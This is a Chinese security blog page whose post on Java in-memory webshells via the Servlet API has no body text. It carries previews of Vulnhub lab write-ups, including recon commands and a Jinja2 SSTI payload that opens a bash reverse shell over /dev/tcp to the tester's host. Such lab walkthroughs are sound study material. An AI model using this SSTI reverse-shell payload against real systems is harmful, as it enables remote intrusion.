加载中...
avatar
文章
27
标签
7
分类
3
首页
关于
标签
分类
归档
Seove0njava内存马-Servlet-Api 返回首页
搜索
首页
关于
标签
分类
归档

java内存马-Servlet-Api

发表于2026-08-01|更新于2026-08-01
|总字数:0|阅读时长:1分钟|浏览量:
文章作者: Seove0n
文章链接: https://cxyadvancer.github.io/2026/08/01/java%E5%86%85%E5%AD%98%E9%A9%AC-Servlet-Api/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Seove0n!
上一篇
Vulnhub-Tempus-Fugit-3
信息搜集1arp-scan -l 扫描一下端口 !!!怎么80没有开,访问网站也是访问不了不知道哪里出了问题。这里又换了成了VirtualBox打开,再扫一次 后来又摸索了一下,发现是kali在nat模式,在桥接模式下的配置没有配好,桥接网卡选择本机的无线网卡就可以了。也是 扫一下目录 1gobuster dir -u http://192.168.141.109 -w medium.txt -x php,txt,zip,html 漏洞利用访问/login,/logout都会重定向到首页,抓包看一下 啥也没有,就是写一个重定向,这里设计得很巧妙啊,没想到是在报错页面存在一个ssti,404页面抓个包 然后就是反弹shell 1{{request.application.__globals__.__builtins__.__import__('os').popen("bash -c 'bash -i >& /dev/tcp/192.168.141.112/4444 0&g...
下一篇
Vulnhub-Web-Machine-N7
环境准备这个靶机比较特殊,不能直接导入到vm中,需要使用VirtualBox。一开始调试了好久也没能把这个虚拟机导入到vm中,后来妥协了,把kali和这个靶机都改为桥接模式 根据这个MAC地址来分辨哪一个是靶机的ip 然后就可以了。 信息搜集扫描网段中存活的主机 1arp-scan -l 对应MAC地址知道靶机ip为192.168.141.136 下一步扫描一下端口 仅开放了80端口 扫一下目录 1gobuster dir -u 'http://192.168.141.136' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,bak 扫出来3个文件,index.html,profile.php,exploit.html 漏洞利用接下来访问一下,发现一个文件上传,上传木马就直接404了 看一下这个html源代码 123456789101112<html> <!-- CSRF PoC - generated by Bu...
avatar
Seove0n
路漫漫其修远兮,吾将上下而求索。
文章
27
标签
7
分类
3
Follow Me
公告
欢迎来到 Seove0n 的博客!
最新文章
puff-pastry2026-08-10
Vulnhub-Tempus-Fugit-32026-08-02
java内存马-Servlet-Api2026-08-01
Vulnhub-Web-Machine-N72026-08-01
Vulnhub-DC-42026-08-01
© 2025 - 2026 By Seove0n框架 Hexo 8.1.1|主题 Butterfly 5.5.5
Seove0n's Blog
搜索
数据加载中